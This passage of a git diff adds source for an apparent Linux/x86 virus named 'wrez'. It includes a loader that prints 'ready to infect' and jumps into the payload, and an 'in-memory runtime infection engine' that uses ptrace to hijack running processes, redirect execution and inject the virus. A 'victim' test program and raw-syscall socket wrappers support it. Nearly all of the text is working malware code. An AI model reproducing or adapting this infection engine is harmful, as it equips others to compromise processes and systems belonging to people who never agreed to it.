+        if (sscanf (lzstr, "%lu:%hu:%hu:%hu:%hu",
+                &cfg->cmprlen, &llstuff, &cfg->hl1stuff, &hl2stuff,
+                &hf2stuff) != 5)
+        {
+                fprintf (stderr, "failed to parse huffman string: %s\n",
+                        argv[3]);
+
+                exit (EXIT_FAILURE);
+        }
+        cfg->llstuff = llstuff;
+        cfg->hl2stuff = hl2stuff;
+        cfg->hf2stuff = hf2stuff;
+
+        printf ("# .. cmprlen\tllstuff\thl1st\thl2st\thf2st\n");
+        printf ("#    0x%04lx\t0x%02x\t0x%04x\t0x%02x\t0x%02x\n",
+                cfg->cmprlen, cfg->llstuff, cfg->hl1stuff, cfg->hl2stuff,
+                cfg->hf2stuff);
+
+        printf ("# fixed, ready to infect.\n");
+
+        /* 0x83 0xc3 0xfc 0x83 = add $0xfffffffc, %ebx */
+        __asm__ __volatile__ (
+                "call   *%%eax\n"
+                "add    $0xfffffffc, %%ebx\n"
+                : : "a" (infile_data), "b" (infile_data));
+
+        printf ("# infected.\n");
+
+        exit (EXIT_SUCCESS);
+}
+
+
+
diff --git a/other/wrez/inmem b/other/wrez/inmem
new file mode 100755
index 0000000..dc928aa
--- /dev/null
+++ b/other/wrez/inmem
diff --git a/other/wrez/inmem-test.c b/other/wrez/inmem-test.c
new file mode 100644
index 0000000..ed15e35
--- /dev/null
+++ b/other/wrez/inmem-test.c
@@ -0,0 +1,24 @@
+
+/* small victim program to test in-memory infection with
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <time.h>
+
+
+int
+main (int argc, char *argv[])
+{
+        int     i = 0;
+
+        srandom (time (NULL));
+
+        for (;;) {
+                printf ("test %5d\n", i++);
+                usleep (400000);
+                (void) malloc (random () % 16384);
+        }
+}
+
diff --git a/other/wrez/inmem.c b/other/wrez/inmem.c
new file mode 100644
index 0000000..00ef599
--- /dev/null
+++ b/other/wrez/inmem.c
@@ -0,0 +1,300 @@
+/* in memory infection code
+ * for x86/linux and the broken ptrace interface only, so far.
+ */
+
+#include <sys/ptrace.h>
+#include <sys/user.h>
+#include "lookup-pm.h"
+#include "wrconfig.h"
+#include "common.c"
+#include "wrutil.c"
+#include "int80.h"
+
+
+#define PF_PTR_MAGIC    0x0039f307      /* unlikely to appear */
+
+typedef struct {
+        int     initial;        /* when PF_PTR_MAGIC, struct is initialized */
+
+        int     pt_state;       /* the ptrace state of the process */
+        int     pt_pid;         /* pid that is being ptraced */
+} pf_ptrs;
+
+
+/* local prototypes
+ */
+#define ptrace(r,p,a,d) im_ptrace(r,p,(void *)a,(void *)d)
+static long im_ptrace (long request, long pid, void *addr, void *data);
+static unsigned int pf_ptrace (void *addr);
+
+
+/* ptrace
+ *
+ * use non-inlined ptrace, because we cannot pass more than three parameters
+ * with the syscall interface.
+ */
+
+static long
+im_ptrace (long request, long pid, void *addr, void *data)
+{
+        long    ret;
+
+        __asm__ __volatile__ (  "int    $0x80"
+                : "=a" (ret)
+                : "a" (__NR_ptrace), "b" (&request));
+
+        return (ret);
+}
+
+
+static unsigned int
+pf_ptrace (void *addr)
+{
+        pf_ptrs *       pfs;
+        unsigned int    data;
+
+        /* static initialization stuff
+         */
+        STATICPTR ((void *) pfs, "12");
+
+        if (((unsigned int) addr) == PF_PTR_MAGIC) {
+                pfs->initial = PF_PTR_MAGIC;
+
+                return (0);
+        } else if (pfs->initial == PF_PTR_MAGIC) {
+                memcpy ((unsigned char *) pfs, (unsigned char *) addr,
+                        sizeof (pf_ptrs));
+                pfs->initial = 0;
+
+                return (0);
+        }
+
+        /* we have a sane pfs pointer by now, so we can actually get work done
+         */
+        data = ptrace (PTRACE_PEEKDATA, pfs->pt_pid, addr, NULL);
+
+#ifdef  TESTING
+        printf ("pt: 0x%08x = PEEKDATA (pid = %5d, addr = 0x%08x)\n",
+                data, pfs->pt_pid, (unsigned int) addr);
+#endif
+
+        /* FIXME: use kernel syscall interface to pull errno, since it is the
+         *        only way we can tell, that ptrace failed.
+         */
+        return (data);
+}
+
+
+int
+inm_call (int pid, char *func, unsigned int *args, unsigned int args_count,
+        unsigned int *retval)
+{
+        pf_ptrs         pfi;            /* initialization struct */
+        void *          pf_ptrace_ptr;  /* local pointer to ptrace function */
+
+        void *          dst_func_entry;
+        int             n;
+        int             failure = 1;
+
+        /* ptrace low level variables
+         */
+        struct user     pt_user,        /* original backup registers */
+                        pt_user_our;    /* temporarily used by us */
+        unsigned int    addr;           /* working address */
+        unsigned int    save_stack[8 + 1];      /* at max 8 arguments */
+#define OPC_MARKER      0xcccccccc
+        unsigned int    save_opcode = OPC_MARKER;
+                                        /* opcode at current %eip */
+        int             status;         /* traced process status */
+
+
+        if (args_count > ((sizeof (save_stack) / sizeof (save_stack[0])) - 1))
+                return (1);
+
+        pfi.initial = 0;
+        pfi.pt_state = 0;       /* XXX: not yet used */
+        pfi.pt_pid = pid;
+
+        pf_ptrace ((void *) PF_PTR_MAGIC);
+        pf_ptrace (&pfi);
+
+        FUNCPTR (pf_ptrace_ptr, "pf_ptrace");
+
+        /* try to resolve "malloc" symbol
+         * XXX: assume a standard linux ELF memory layout, start at 0x08048000
+         */
+        dst_func_entry = symbol_resolve (pf_ptrace_ptr,
+                (void *) 0x08048000, func);
+
+        if (dst_func_entry == NULL)
+                return (1);
+
+        /* now that we have the address of malloc, lets get the space to
+         * inject us into the process
+         *
+         * order: 1. save anything we will modify later
+         *        2. build stack frame for malloc parameters and call malloc
+         *        3. restore everything we touched
+         */
+        /* step 1: save registers and stack content */
+        if (ptrace (PTRACE_GETREGS, pid, NULL, &pt_user) < 0)
+                return (1);
+
+        memcpy (&pt_user_our, &pt_user, sizeof (pt_user_our));
+
+        addr = pt_user.regs.esp;
+        for (n = 0 ; n < (sizeof (save_stack) / sizeof (save_stack[0])) ; ++n)
+                save_stack[n] = ptrace (PTRACE_PEEKDATA, pid,
+                        addr + 4 * n, NULL);
+
+        /* step 2: setup call frame on stack
+         * stack layout:
+         *
+         * pt_user.regs.esp -> top_val          not modified
+         *              + 4    parameter #last
+         *              + ...  parameter #1
+         * new esp ->   + ...  return address   set to magic
+         */
+        for (addr = pt_user.regs.esp - sizeof (int), n = args_count - 1 ;
+                n >= 0 ; --n, addr -= 4)
+        {
+                if (ptrace (PTRACE_POKEDATA, pid, addr, args[n]) < 0)
+                        goto bail;
+        }
+
+        /* now setup an "int3" trap at the current eip, and use this as
+         * return address. ptrace will poke into any kind of page protection,
+         * so this really should be no problem, even with -w pages.
+         *
+         * 1. put the retaddr on top of the stack
+         * 2. save the old opcodes from the current eip
+         * 3. overwrite the current instruction
+         */
+        if (ptrace (PTRACE_POKEDATA, pid, addr, pt_user.regs.eip) < 0)
+                goto bail;
+
+        save_opcode = ptrace (PTRACE_PEEKDATA, pid, pt_user.regs.eip, NULL);
+        if (ptrace (PTRACE_POKEDATA, pid, pt_user.regs.eip, 0xcccccccc) < 0)
+                goto bail;
+
+
+        /* step 2: call malloc, redirect eip
+         */
+        pt_user_our.regs.esp = addr;
+        pt_user_our.regs.eip = (unsigned int) dst_func_entry;
+        if (ptrace (PTRACE_SETREGS, pid, NULL, &pt_user_our) < 0)
+                goto bail;
+
+#if 0
+        /**** XXX: this is an alternative implementation using singlestepping.
+         * it is slower but does not have to modify the .text section of the
+         * running process.
+         */
+
+        /* single step through malloc function, until we reach our magic
+         * return address (malloc return value is in %eax afterwards)
+         */
+        do {
+                if (ptrace (PTRACE_SINGLESTEP, pid, NULL, NULL) < 0)
+                        goto bail;
+
+                wait (NULL);
+
+                if (ptrace (PTRACE_GETREGS, pid, NULL, &pt_user_our) < 0)
+                        goto bail;
+        } while (pt_user_our.regs.eip != PF_RETADDR_MAGIC);
+#endif
+        if (ptrace (PTRACE_CONT, pid, NULL, NULL) < 0)
+                goto bail;
+
+        waitpid (pid, &status, 0);      /* detrap */
+        if (WIFEXITED (status))
+                goto bail;
+
+        /* save function return value for later use
+         */
+        if (ptrace (PTRACE_GETREGS, pid, NULL, &pt_user_our) < 0)
+                goto bail;
+        *retval = (unsigned int) pt_user_our.regs.eax;
+
+        failure = 0;
+
+bail:   /* restore stack frame */
+        for (n = 0 ; n < (sizeof (save_stack) / sizeof (save_stack[0])) ; ++n)
+                ptrace (PTRACE_POKEDATA, pid, addr + 4 * n, save_stack[n]);
+
+        /* restore registers */
+        ptrace (PTRACE_SETREGS, pid, NULL, &pt_user);
+
+        if (save_opcode != OPC_MARKER)
+                ptrace (PTRACE_POKEDATA, pid, pt_user.regs.eip, save_opcode);
+
+        return (failure);
+}
+
+
+#ifdef  TESTING
+
+int
+main (int argc, char *argv[])
+{
+        int             fpid;
+        char *          eargv[2];
+        char *          func;
+        unsigned int    margs[1],
+                        mret;
+        int             status;
+
+        STRINGPTR (eargv[0], "/tmp/inmem-test");
+        eargv[1] = NULL;
+
+        fpid = fork ();
+        if (fpid < 0)
+                _exit (0);
+
+        /* child */
+        if (fpid == 0) {
+                if (ptrace (PTRACE_TRACEME, 0, NULL, NULL) != 0)
+                        _exit (0);
+
+                execve (eargv[0], eargv, NULL);
+                write (2, "FAILURE!\n", 9);
+                _exit (0);
+        }
+
+        wait (NULL);
+
+        /* now start the show, then wait a bit and inject ourselves
+         */
+        ptrace (PTRACE_CONT, fpid, NULL, NULL);
+
+        sleep (1);
+        kill (fpid, SIGSTOP);
+
+        waitpid (fpid, &status, 0);
+        printf ("status: 0x%08x\n", status);
+
+        if (WIFEXITED (status)) {
+                printf ("child exited, aborting\n");
+
+                _exit (1);
+        }
+
+        STRINGPTR (func, "malloc");
+        margs[0] = 0x1234;
+
+        if (inm_call (fpid, func, margs, 1, &mret) != 0) {
+                printf ("malloc in victim process failed\n");
+
+                _exit (1);
+        }
+
+        printf ("malloc in process %d: 0x%08x\n", fpid, mret);
+        ptrace (PTRACE_DETACH, fpid, NULL, NULL);
+
+        printf ("exiting\n");
+}
+
+#endif
+
+
diff --git a/other/wrez/inmem.h b/other/wrez/inmem.h
new file mode 100644
index 0000000..b9eacd8
--- /dev/null
+++ b/other/wrez/inmem.h
@@ -0,0 +1,35 @@
+/* inmem.c - in-memory runtime infection engine
+ *
+ * this module provide the capability to attach to other running processes
+ * through the 'ptrace' debug interface on linux/x86. it provides abstracted
+ * functions to call functions within the attached process and to infect the
+ * runtime image of the process with the entire virus in a safe way. it is
+ * optimized for a minimum of context switches, so infection does not delay
+ * normal execution.
+ */
+
+#ifndef INMEM_H
+#define INMEM_H
+
+
+/* inm_call
+ *
+ * obtain the address of function `func' in already traced process referenced
+ * by `pid' and call with parameter frame `args', which is `args_count' words
+ * long. when `retval' is non-NULL, store return value of function call in it.
+ * will clobber pf_ptrace's static frame.
+ *
+ * XXX: the process `pid' has to be in stopped state with us already having
+ *      waitpid'ed on it, else this function might run into serious blocking
+ *      or ptrace-misbehave issues.
+ *
+ * return 0 on success
+ * return != 0 on failure
+ */
+
+int inm_call (int pid, char *func, unsigned int *args,
+        unsigned int args_count, unsigned int *retval);
+
+
+#endif
+
diff --git a/other/wrez/inmem.o b/other/wrez/inmem.o
new file mode 100644
index 0000000..04bc986
--- /dev/null
+++ b/other/wrez/inmem.o
diff --git a/other/wrez/int80-net.h b/other/wrez/int80-net.h
new file mode 100644
index 0000000..2e67eca
--- /dev/null
+++ b/other/wrez/int80-net.h
@@ -0,0 +1,429 @@
+
+
+#ifndef INT80_NET_H
+#define INT80_NET_H
+
+
+#define SOCK_STREAM     1
+#define SOCK_DGRAM      2
+#define SOCK_RAW        3
+
+#define PF_LOCAL        1
+#define PF_UNIX         PF_LOCAL
+#define PF_FILE         PF_LOCAL
+#define PF_INET         2
+#define PF_INET6        10
+#define PF_NETLINK      16
+#define PF_ROUTE        PF_NETLINK
+#define PF_PACKET       17
+
+#define AF_UNSPEC       PF_UNSPEC
+#define AF_LOCAL        PF_LOCAL
+#define AF_UNIX         PF_UNIX
+#define AF_FILE         PF_FILE
+#define AF_INET         PF_INET
+#define AF_INET6        PF_INET6
+#define AF_NETLINK      PF_NETLINK
+#define AF_ROUTE        PF_ROUTE
+#define AF_PACKET       PF_PACKET
+
+#define MSG_OOB         0x01
+#define MSG_PEEK        0x02
+#define MSG_DONTWAIT    0x40
+
+
+#pragma pack(1)
+struct in_addr {
+        unsigned int    s_addr;
+};
+
+struct sockaddr_in {
+//      unsigned char   sin_len;
+        unsigned short  sin_family;
+        unsigned short  sin_port;
+        struct in_addr  sin_addr;
+        char            sin_zero[8];
+};
+
+#define SYS_SOCKET      1               /* sys_socket(2)                */
+#define SYS_BIND        2               /* sys_bind(2)                  */
+#define SYS_CONNECT     3               /* sys_connect(2)               */
+#define SYS_LISTEN      4               /* sys_listen(2)                */
+#define SYS_ACCEPT      5               /* sys_accept(2)                */
+#define SYS_GETSOCKNAME 6               /* sys_getsockname(2)           */
+#define SYS_GETPEERNAME 7               /* sys_getpeername(2)           */
+#define SYS_SOCKETPAIR  8               /* sys_socketpair(2)            */
+#define SYS_SEND        9               /* sys_send(2)                  */
+#define SYS_RECV        10              /* sys_recv(2)                  */
+#define SYS_SENDTO      11              /* sys_sendto(2)                */
+#define SYS_RECVFROM    12              /* sys_recvfrom(2)              */
+#define SYS_SHUTDOWN    13              /* sys_shutdown(2)              */
+#define SYS_SETSOCKOPT  14              /* sys_setsockopt(2)            */
+#define SYS_GETSOCKOPT  15              /* sys_getsockopt(2)            */
+#define SYS_SENDMSG     16              /* sys_sendmsg(2)               */
+#define SYS_RECVMSG     17              /* sys_recvmsg(2)               */
+
+typedef int socklen_t;
+
+
+static inline int
+socket (int domain, int type, int protocol)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (domain), "m" (type), "m" (protocol),
+                "a" (__NR_socketcall), "b" (SYS_SOCKET) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+bind (int sock, struct sockaddr_in *addr, socklen_t *addrlen)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (sock), "m" (addr), "m" (addrlen),
+                "a" (__NR_socketcall), "b" (SYS_BIND) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+connect (int sock, const struct sockaddr_in *addr, socklen_t *addrlen)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (sock), "m" (addr), "m" (addrlen),
+                "a" (__NR_socketcall), "b" (SYS_CONNECT) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+listen (int sock, int backlog)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x08, %%esp
+                " : "=a" (ret)
+                : "m" (sock), "m" (backlog),
+                "a" (__NR_socketcall), "b" (SYS_LISTEN) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+accept (int sock, struct sockaddr_in *addr, socklen_t *addrlen)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (sock), "m" (addr), "m" (addrlen),
+                "a" (__NR_socketcall), "b" (SYS_ACCEPT) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+getsockname (int sock, struct sockaddr_in *name, socklen_t *namelen)
+{
+        register int    ret;
+
+        /* eeks, if just inlining was better documented.
+         */
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (sock), "m" (name), "m" (namelen),
+                "a" (__NR_socketcall), "b" (SYS_GETSOCKNAME) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+getpeername (int sock, struct sockaddr_in *name, socklen_t *namelen)
+{
+        register int    ret;
+
+        /* eeks, if just inlining was better documented.
+         */
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (sock), "m" (name), "m" (namelen),
+                "a" (__NR_socketcall), "b" (SYS_GETPEERNAME) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+socketpair (int d, int type, int protocol, int sv[2])
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %4
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x10, %%esp
+                " : "=a" (ret)
+                : "m" (d), "m" (type), "m" (protocol), "m" (sv),
+                "a" (__NR_socketcall), "b" (SYS_SOCKETPAIR) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+send (int s, const void *msg, int len, int flags)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %4
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x10, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (msg), "m" (len), "m" (flags),
+                "a" (__NR_socketcall), "b" (SYS_SEND) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+recv (int s, void *buf, int len, int flags)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %4
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x10, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (buf), "m" (len), "m" (flags),
+                "a" (__NR_socketcall), "b" (SYS_RECV) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+sendto (int s, const void *msg, int len, int flags,
+        const struct sockaddr_in *to, socklen_t tolen)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %6
+                pushl   %5
+                pushl   %4
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x18, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (msg), "m" (len), "m" (flags), "m" (to),
+                "m" (tolen), "a" (__NR_socketcall), "b" (SYS_SENDTO) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+recvfrom (int s, void *buf, int len, int flags,
+        struct sockaddr_in *from, socklen_t *fromlen)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %6
+                pushl   %5
+                pushl   %4
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x18, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (buf), "m" (len), "m" (flags), "m" (from),
+                "m" (fromlen), "a" (__NR_socketcall), "b" (SYS_RECVFROM) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+shutdown (int sock, int how)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x08, %%esp
+                " : "=a" (ret)
+                : "m" (sock), "m" (how),
+                "a" (__NR_socketcall), "b" (SYS_SHUTDOWN) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+setsockopt (int s, int level, int optname, const void *optval,
+        socklen_t optlen)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %5
+                pushl   %4
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x14, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (level), "m" (optname), "m" (optval),
+                "m" (optlen), "a" (__NR_socketcall),
+                "b" (SYS_SETSOCKOPT) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+getsockopt (int s, int level, int optname, void *optval, socklen_t *optlen)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %5
+                pushl   %4
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x14, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (level), "m" (optname), "m" (optval),
+                "m" (optlen), "a" (__NR_socketcall),
+                "b" (SYS_GETSOCKOPT) : "ecx");
+
+        return (ret);
+}
+
+
+static inline int
+sendmsg (int s, const void *msg, int flags)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (msg), "m" (flags),
+                "a" (__NR_socketcall), "b" (SYS_SENDMSG) : "ecx");
+
+        return (ret);
+}
+
+static inline int
+recvmsg (int s, void *msg, int flags)
+{
+        register int    ret;
+
+        __asm__ __volatile__ ("
+                pushl   %3
+                pushl   %2
+                pushl   %1
+                movl    %%esp, %%ecx
+                int     $0x80
+                addl    $0x0c, %%esp
+                " : "=a" (ret)
+                : "m" (s), "m" (msg), "m" (flags),
+                "a" (__NR_socketcall), "b" (SYS_RECVMSG) : "ecx");
+
+        return (ret);
+}
+
+#endif
+
+
diff --git a/other/wrez/int80.h b/other/wrez/int80.h
new file mode 100644
index 0000000..0701ba7
--- /dev/null
+++ b/other/wrez/int80.h
@@ -0,0 +1,586 @@
+#ifndef INT80_H
+#define INT80_H
+
+#include "unistd.h"
+
+#ifndef _I386_FCNTL_H
+#define O_RDONLY    00
+#define O_WRONLY    01
+#define O_RDWR      02
+#define O_CREAT   0100
+#define O_TRUNC  01000
+#define O_APPEND 02000
+#define F_DUPFD         0       /* Duplicate file descriptor.  */
+#define F_GETFD         1       /* Get file descriptor flags.  */
+#define F_SETFD         2       /* Set file descriptor flags.  */
+#define F_GETFL         3       /* Get file status flags.  */
+#define F_SETFL         4       /* Set file status flags.  */
+#endif
+
+/* from bits/termios.h */
+#define TCGETS          0x5401
+#define TCSETS          0x5402
+#define TCSETSW         0x5403
+#define TCSETSF         0x5404
+
+#define ISIG    0000001
+#define ECHO    0000010
+
+
+/* wait bits
+ */
+#define WNOHANG         0x01
+#define WUNTRACED       0x02
+
+#define WEXITSTATUS(status)     (((status) & 0xff00) >> 8)
+
+/* If WIFSIGNALED(STATUS), the terminating signal.  */
+#define WTERMSIG(status)        ((status) & 0x7f)
+
+/* If WIFSTOPPED(STATUS), the signal that stopped the child.  */
+#define WSTOPSIG(status)        WEXITSTATUS(status)
+
+/* Nonzero if STATUS indicates normal termination.  */
+#define WIFEXITED(status)       (WTERMSIG(status) == 0)
+
+#define WIFSIGNALED(status)     (!WIFSTOPPED(status) && !WIFEXITED(status))
+
+/* Nonzero if STATUS indicates the child is stopped.  */
+#define WIFSTOPPED(status)      (((status) & 0xff) == 0x7f)
+
+/* Nonzero if STATUS indicates the child dumped core.  */
+#define WCOREDUMP(status)       ((status) & WCOREFLAG)
+
+/* Macros for constructing status values.  */
+#define W_EXITCODE(ret, sig)    ((ret) << 8 | (sig))
+#define W_STOPCODE(sig) ((sig) << 8 | 0x7f)
+#define WCOREFLAG               0x80
+
+
+typedef unsigned char   cc_t;
+typedef unsigned int    speed_t;
+typedef unsigned int    tcflag_t;
+
+#define NCCS    32
+
+typedef struct {
+        tcflag_t        c_iflag;        /* input mode flags */
+        tcflag_t        c_oflag;        /* output mode flags */
+        tcflag_t        c_cflag;        /* control mode flags */
+        tcflag_t        c_lflag;        /* local mode flags */
+        cc_t            c_line;         /* line discipline */
+        cc_t            c_cc[NCCS];     /* control characters */
+        speed_t         c_ispeed;       /* input speed */
+        speed_t         c_ospeed;       /* output speed */
+} termios;
+
+/* from bits/utsname.h and sys/utsname.h */
+#define _UTSNAME_LENGTH 65
+#define _UTSNAME_DOMAIN_LENGTH _UTSNAME_LENGTH
+#define _UTSNAME_NODENAME_LENGTH _UTSNAME_LENGTH
+
+struct utsname {
+        char    sysname[_UTSNAME_LENGTH];
+        char    nodename[_UTSNAME_NODENAME_LENGTH];
+        char    release[_UTSNAME_LENGTH];
+        char    version[_UTSNAME_LENGTH];
+        char    machine[_UTSNAME_LENGTH];
+        char    domainname[_UTSNAME_DOMAIN_LENGTH];
+};
+
+
+typedef struct {
+        unsigned long   __val[2];
+} __u_quad_t;
+
+struct stat {
+        unsigned char   space1[6 * 4];
+        /* __uid_t */   unsigned int st_uid;    /* User ID of the file's owner. */
+        /* __gid_t */   unsigned int st_gid;    /* Group ID of the file's group. */
+        unsigned char   space2[8 * 4];
+        /* __time_t */  long int st_atime;      /* Time of last access. */
+        unsigned long int        __unused1;
+        /* __time_t */  long int st_mtime;      /* Time of last modification. */
+        unsigned long int       __unused2;
+        /* __time_t */  long int st_ctime;      /* Time of last status change. */
+        unsigned long int       space3[8 * 4];  /* safety margin */
+};
+
+#if 0
+struct stat {
+        /* __dev_t */   __u_quad_t st_dev;      /* Device.  */
+        unsigned short int      __pad1;
+        /* __ino_t */   unsigned long st_ino;   /* File serial number. */
+        /* __mode_t */  unsigned int st_mode;   /* File mode. */
+        /* __nlink_t */ unsigned int st_nlink;  /* Link count. */
+        /* __uid_t */   unsigned int st_uid;    /* User ID of the file's owner. */
+        /* __gid_t */   unsigned int st_gid;    /* Group ID of the file's group. */
+        /* __dev_t */   __u_quad_t st_rdev;     /* Device number, if device. */
+        unsigned short int      __pad2;
+        /* __off_t */   long int st_size;       /* Size of file, in bytes. */
+        /* __blksize_t*/long int st_blksize;    /* Optimal block size for I/O. */
+
+        /* __blkcnt_t */long int st_blocks;     /* Number 512-byte blocks allocated. */
+        /* __time_t */  long int st_atime;      /* Time of last access. */
+        unsigned long int        __unused1;
+        /* __time_t */  long int st_mtime;      /* Time of last modification. */
+        unsigned long int       __unused2;
+        /* __time_t */  long int st_ctime;      /* Time of last status change. */
+        unsigned long int       __unused3;
+        unsigned long int       __unused4;
+        unsigned long int       __unused5;
+};
+#endif
+
+struct utimbuf {
+        /* time_t */    long int actime;        /* access time */
+        /* time_t */    long int modtime;       /* modification time */
+};
+
+struct timeval {
+        long int        tv_sec;         /* seconds */
+        long int        tv_usec;        /* microseconds */
+};
+
+struct dirent {
+        long            d_ino;
+        int             d_off;
+        unsigned short  d_reclen;
+        char            d_name[256];
+};
+
+/* from bits/mman.h */
+#define PROT_READ       0x1
+#define PROT_WRITE      0x2
+#define PROT_EXEC       0x4
+#define PROT_NONE       0x0
+#define MAP_SHARED      0x01
+#define MAP_PRIVATE     0x02
+#define MAP_TYPE        0x0f
+#define MAP_FIXED       0x10
+#define MAP_ANONYMOUS   0x20
+
+/* from unistd.h */
+#define SEEK_SET        0
+#define SEEK_CUR        1
+#define SEEK_END        2
+
+extern int      errno;
+
+static inline int getdents (int fd, struct dirent *dirp, unsigned int count)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_getdents), "b" ((long) fd),
+                        "c" ((long) dirp), "d" ((long) count));
+
+        return ret;
+}
+
+static inline int settimeofday (struct timeval *tv, void *tz)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_settimeofday), "b" ((long) tv),
+                        "c" ((long) tz));
+
+        return ret;
+}
+
+static inline int gettimeofday (struct timeval *tv, void *tz)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_gettimeofday), "b" ((long) tv),
+                        "c" ((long) tz));
+
+        return ret;
+}
+
+static inline int stat (char *filename, struct stat *sst)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_stat64), "b" ((long) filename),
+                        "c" ((long) sst));
+
+        return ret;
+}
+
+static inline int utime (char *filename, struct utimbuf *buf)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_utime), "b" ((long) filename),
+                        "c" ((long) buf));
+
+        return ret;
+}
+
+static inline int munmap (char *start, int length)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_munmap), "b" ((long) start),
+                        "c" ((int) length));
+
+        return ret;
+}
+
+#if 0
+static inline int ioctl (int d, int request, int argp)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_ioctl), "S" ((long)d),
+                              "c" ((long)request), "d" ((long)argp): "bx");
+        return ret;
+}
+
+static inline int fcntl (int fd, int cmd, long arg)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
+                             :"=a" (ret)
+                             :"0" (__NR_fcntl), "S" ((long)fd),
+                              "c" ((long)cmd), "d" ((long)arg): "bx");
+        return ret;
+}
+#endif
+
+static inline int lseek (int fd, unsigned long int offset, int whence)
+{
+        long ret;
+
+        __asm__ __volatile__ ("int $0x80"
+                : "=a" (ret)
+                : "a" (__NR_lseek), "b" ((long) fd),
+                        "c" ((long) offset), "d" ((long) whence));
+
+        return ret;
+}
+
+#if 0
+static inline int mprotect(void *addr, long len, int prot)
+{
+        long ret;
+        
+        __asm__ __volatile__ ("pushl %%ebx\n\t"
+                              "movl %%esi, %%ebx\n\t"
+                              "int $0x80"
